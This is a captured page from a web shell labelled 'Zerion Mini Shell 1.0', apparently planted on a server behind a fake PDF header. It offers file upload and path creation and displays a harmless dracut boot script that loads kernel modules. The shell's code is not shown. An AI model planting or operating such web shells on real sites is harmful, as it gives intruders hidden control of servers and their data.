%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/share/dracut/modules.d/96insmodpost/
Upload File :
Create Path :
Current File : //usr/share/dracut/modules.d/96insmodpost/insmodpost.sh

#!/bin/sh
# -*- mode: shell-script; indent-tabs-mode: nil; sh-basic-offset: 4; -*-
# ex: ts=8 sw=4 sts=4 et filetype=sh
. /lib/dracut-lib.sh

for i in $(getargs rdinsmodpost=); do 
    (
        IFS=,
        for p in $i; do 
            modprobe $p
        done
    )
done

Zerion Mini Shell 1.0